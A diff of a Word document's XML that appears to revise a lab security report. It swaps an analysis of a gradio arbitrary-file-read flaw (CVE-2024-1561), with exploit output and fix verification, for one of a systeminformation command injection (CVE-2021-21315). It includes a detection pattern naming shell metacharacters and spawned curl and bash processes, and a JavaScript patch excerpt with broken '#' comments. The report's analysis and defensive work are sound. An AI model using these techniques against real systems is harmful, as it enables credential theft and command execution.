-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[fonts]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[extensions]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[mci extensions]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[files]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[Mail]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>MAPI=1</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[VULNERABLE] CVE-2024-1561 reproduced successfully</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="200"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="595F66"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Output of exploit/gradio_exploit.py against the vulnerable version.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The transcript above was produced by running the chain against a real gradio 4.12.0 process, not against the Docker container. Because that run happened on Windows, the target file was C:\Windows\win.ini instead of /etc/passwd; the three requests, the returned cache path and the leaked contents are otherwise identical to what the Vulhub container returns.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="80" w:after="200"/>
-        <w:jc w:val="center"/>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFF8E1"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="4" w:space="4" w:color="E0B44C"/>
-          <w:left w:val="single" w:sz="4" w:space="4" w:color="E0B44C"/>
-          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="E0B44C"/>
-          <w:right w:val="single" w:sz="4" w:space="4" w:color="E0B44C"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="8A5A00"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>[ SCREENSHOT PLACEHOLDER ]  Burp Suite / browser screenshot of the same three requests (optional; the script output above is the primary evidence).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The consequences are easy to underestimate. Any file readable by the gradio process can be copied out: application .env files with API keys, ~/.aws/credentials, ~/.ssh/id_rsa, /proc/self/environ, database files. On Hugging Face Spaces, where gradio is the default framework, the same request would expose the Space's secrets.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11. Root-cause analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The defect is not a missing quote or a forgotten escape; it is an access-control and API-design error, and it takes three independent mistakes to become exploitable. Removing any one of them breaks the chain, which is why the fix is a one-line change but the analysis has to look at all three.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11.1 Defect 1 — dynamic dispatch without an allow-list</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The vulnerable handler looked the requested function up by name on the component object:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="170"/>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:left w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-          <w:right w:val="single" w:sz="4" w:space="4" w:color="D0D5DD"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t># gradio/routes.py, 4.12.0 (vulnerable)</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>fn = getattr(block, body.fn_name)</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>return fn(body.data)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>getattr with an attacker-controlled string means the set of callable targets is not 'the functions we designed as an API' but 'every attribute of this object'. Any method added to Block or Component — now or in a future release — automatically becomes a remotely invocable endpoint. This is the classic mass-assignment / unsafe reflection mistake, expressed in Python.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11.2 Defect 2 — a dangerous server-side helper was reachable</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>move_resource_to_block_cache() exists so that the front end can hand a file to the back end: it takes a path, copies that file into the block cache and returns the new location. It was written as an internal helper, so it validates nothing — no realpath containment check, no allow-list of directories, no check that the argument came from an upload widget. Combined with Defect 1 it becomes 'copy any file I name'. Defect 2 is what turns a design smell into a file-read primitive.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11.3 Defect 3 — the copy is served back</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The /file= route exists to serve files that gradio itself produced. Because the copy now lives in gradio's own cache directory, the server happily serves it. Without this step the attacker would know that a file was copied but not what it contained; with it, the data leaves the host.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11.4 Why an unauthenticated user gets this far</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Gradio's threat model treats the web UI as the only client and assumes the network boundary is the protection. There is no authentication by default (launch(auth=...) is opt-in) and /component_server was never classified as a privileged endpoint, so it inherited the 'public' status of the UI. The moment such an application is exposed — a public Space, a shared demo, a dashboard behind only a reverse proxy — the internal helper becomes a public API. This is exactly OWASP A01:2021 Broken Access Control, with A05:2021 Security Misconfiguration as the enabling condition.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11.5 Classification and detection</w:t>
+        <w:t>11.4 Classification and detection</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6826,7 +6335,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>CWE-29 Path Traversal (the copy primitive); more broadly CWE-749 exposed dangerous method and CWE-862 missing authorization</w:t>
+              <w:t>CWE-78 OS command injection (with a type-confusion element in the parameter contract)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6859,7 +6368,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>A01 Broken Access Control, A05 Security Misconfiguration</w:t>
+              <w:t>A03 Injection, with A06 Vulnerable and Outdated Components as the enabling condition</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6892,7 +6401,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>7.5 — network, low complexity, no privileges, no user interaction, high confidentiality impact, no integrity/availability impact</w:t>
+              <w:t>7.8 — the vector is AV:L because the library only executes when the host application calls it; the moment an application forwards user input (as ours does) it becomes a remote issue</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6911,7 +6420,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>Why SAST would not catch it in *our* code</w:t>
+              <w:t>Why SAST would not catch it in our code</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6925,7 +6434,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>the defect is in a dependency, not in app/ — bandit only sees our source</w:t>
+              <w:t>the defect is in node_modules, not in app/ — bandit scans our Python sources</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6958,7 +6467,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>pip-audit maps gradio 4.12.0 to the advisory; this is precisely why the pipeline in section 6 has an SCA stage</w:t>
+              <w:t>pip-audit / npm audit map the pinned version to the advisory; this is the same class of finding as the pip-audit result in section 6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6991,7 +6500,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>unusual POSTs to /component_server with fn_name values that are not part of the UI; /file= requests for paths outside the expected cache prefix</w:t>
+              <w:t>requests whose parameter contains `;`, `|`, `&amp;`, `$(` or backticks; unusual response-time outliers on a status endpoint; child processes such as `sleep`, `curl`, `bash` spawning from the Node worker</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7007,7 +6516,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>12. Developed protection measures</w:t>
+        <w:t>12. Protection measures</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7020,7 +6529,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Two options exist: change the configuration, or update the component. Because the flaw is in the library, configuration can only reduce exposure (bind to localhost, put an authenticating proxy in front), while the real remedy is the patched release. The fix therefore pins gradio 4.13.0 in the image definition:</w:t>
+        <w:t>Because the flaw is in the library, configuration can only reduce exposure. The remedy is the patched release, and the fixed image pins it:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7050,7 +6559,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>FROM python:3.11-slim</w:t>
+        <w:t>FROM node:18-alpine</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7059,7 +6568,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>RUN pip install --no-cache-dir "gradio==4.13.0"</w:t>
+        <w:t>WORKDIR /srv</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7068,7 +6577,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>WORKDIR /srv</w:t>
+        <w:t>COPY app/package.json /srv/package.json</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7077,7 +6586,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>COPY app/app.py /srv/app.py</w:t>
+        <w:t>RUN npm install --no-audit --no-fund systeminformation@5.3.1 --save-exact</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7086,7 +6595,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>RUN useradd --create-home --uid 10001 gradio &amp;&amp; chown -R gradio:gradio /srv</w:t>
+        <w:t>COPY app/server.js /srv/server.js</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7095,7 +6604,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>USER gradio</w:t>
+        <w:t>ENV ALLOW_LIST=1</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7104,16 +6613,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>EXPOSE 7860</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>CMD ["python", "app.py"]</w:t>
+        <w:t>USER app</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7152,7 +6652,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>[+] Building 42.1s (8/8) FINISHED</w:t>
+        <w:t xml:space="preserve"> ✔ Container cve-2021-21315-api-1  Started</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7161,7 +6661,16 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ✔ Container cve-2024-1561-fixed  Started</w:t>
+        <w:t>$ curl -s http://127.0.0.1:3000/health</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>{"ok":true,"version":"5.3.1"}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7174,7 +6683,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The upstream patch (PR #6884) changes the dispatch itself, not the payload filtering:</w:t>
+        <w:t>The upstream commit makes two changes, and both are necessary:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7195,7 +6704,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t># gradio/routes.py, 4.13.0 (fixed)</w:t>
+        <w:t># 1. the parameter contract is enforced</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7204,7 +6713,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>fn = getattr(block, body.fn_name, None)</w:t>
+        <w:t>if (typeof proc !== 'string') {            # arrays and objects are refused</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7213,7 +6722,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>if fn is None or not getattr(fn, "_is_server_fn", False):</w:t>
+        <w:t xml:space="preserve">  if (callback) { callback([]); }</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7222,7 +6731,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">    raise HTTPException(status_code=404, detail="Function not found.")</w:t>
+        <w:t xml:space="preserve">  return resolve([]);</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7231,7 +6740,34 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>return fn(body.data)</w:t>
+        <w:t>}</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t># 2. the value is filtered where it was not before</w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="1B1F24"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:t>const s = util.sanitizeShellString(proc);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7244,20 +6780,7 @@
           <w:color w:val="595F66"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>Only methods explicitly decorated as @server functions can now be invoked remotely.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>This is effective for three reasons. First, it replaces a blacklist with an allow-list: the set of reachable functions is now defined by the decorator, so future internal helpers are unreachable by default. Second, move_resource_to_block_cache is not a @server function, so step 2 of the chain returns 404 before any file is copied. Third, because the check happens before dispatch, there is no path-traversal filter to bypass — a filter on the 'data' argument would have been the weaker fix (absolute paths, symlinks, encodings), and the patch avoids it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>12.3 Defence in depth</w:t>
+        <w:t>The same pair of changes is applied to the docker helpers and to networkStats.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7266,7 +6789,7 @@
         <w:spacing w:after="60"/>
       </w:pPr>
       <w:r>
-        <w:t>Never expose a gradio dashboard without auth=... if it is reachable from an untrusted network.</w:t>
+        <w:t>The type check removes the coercion path: an array can no longer become a string on its way to the shell.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7275,7 +6798,7 @@
         <w:spacing w:after="60"/>
       </w:pPr>
       <w:r>
-        <w:t>Place such services on an internal network or behind an authenticating reverse proxy.</w:t>
+        <w:t>The sanitiser calls close the call sites that previously passed the value straight into exec().</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7284,7 +6807,7 @@
         <w:spacing w:after="60"/>
       </w:pPr>
       <w:r>
-        <w:t>Run as a non-root user (already in Dockerfile.fixed): a file read then cannot reach /etc/shadow.</w:t>
+        <w:t>The check happens before the command is built, so nothing is executed even in part.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7293,38 +6816,20 @@
         <w:spacing w:after="60"/>
       </w:pPr>
       <w:r>
-        <w:t>Mount only the directories the application needs; keep .env, SSH keys and cloud credentials out of the container image.</w:t>
+        <w:t>It is a library-level fix, so every consumer of the package inherits it by upgrading — which is why SCA, not code review, is the control that finds this class of problem.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:spacing w:after="60"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>Keep gradio under SCA monitoring — this class of bug recurs (CVE-2023-51449 in the same product).</w:t>
+        <w:t>12.3 What the patch does not fix, and the application-side control</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-        <w:spacing w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Log and alert on POSTs to internal endpoints that the UI never calls.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>13. Verifying the fix</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The same exploitation steps were repeated against the fixed container, followed by a regression test to prove the application still works.</w:t>
+      <w:r>
+        <w:t>The patched library still calls exec() with a concatenated command line. A blacklist at the sink is one bypass away from failing again, so the application must not rely on it. The fixed image therefore also enables an allow-list, which is the durable control because it does not depend on the library version:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7345,7 +6850,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>$ python exploit/verify_fix.py http://127.0.0.1:7860</w:t>
+        <w:t>const NAME_RE = /^[A-Za-z0-9._-]{1,32}$/;</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7354,7 +6859,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>if (ALLOW_LIST &amp;&amp; !NAME_RE.test(name)) {</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7363,7 +6868,7 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>=== 1. GET /config ===</w:t>
+        <w:t xml:space="preserve">  return res.status(400).json({ error: 'invalid service name' });</w:t>
         <w:br/>
       </w:r>
       <w:r>
@@ -7372,142 +6877,350 @@
           <w:color w:val="1B1F24"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>&lt; HTTP 200</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[i] components exposed by /config: [1, 2, 3]</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>=== 2. POST /component_server ===</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; HTTP 404</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>{"detail":"Function not found."}</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[!] every component id was rejected by /component_server</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>=== regression test: the Gradio app still works ===</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; GET /config -&gt; 200</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>&lt; GET /        -&gt; 200</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[PASS] the interface is still served</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>=== summary ===</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[PASS] CVE-2024-1561 no longer reproducible</w:t>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1B1F24"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:t>[PASS] regression test green -&gt; fix validated</w:t>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The complete set of measures, in the order they should be applied:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
+        <w:tblLayout w:type="fixed"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1474"/>
+        <w:gridCol w:w="4876"/>
+        <w:gridCol w:w="2835"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader w:val="true"/>
+          <w:cantSplit w:val="true"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="1474"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Layer</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="4876"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Measure</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2835"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="1F3B63"/>
+          </w:tcPr>
+          <w:p>
+            <w:r/>
